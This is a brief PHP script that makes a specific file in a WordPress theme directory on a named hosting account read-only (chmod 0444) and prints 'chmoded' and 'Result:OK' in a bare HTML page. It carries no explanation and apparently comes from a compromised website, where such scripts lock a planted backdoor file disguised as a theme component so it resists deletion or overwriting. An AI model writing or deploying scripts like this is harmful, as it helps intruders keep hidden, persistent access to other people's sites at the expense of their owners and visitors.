<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";ob_start();if(chmod('/home/com4r4t4/public_html/wp-content/themes/betheme/muffin-options/_dark/framework.php', 0444)) echo "chmoded";$c = ob_get_clean();print("<textarea>$c</textarea>");echo "Result:OK"; echo "</body></html>"; die;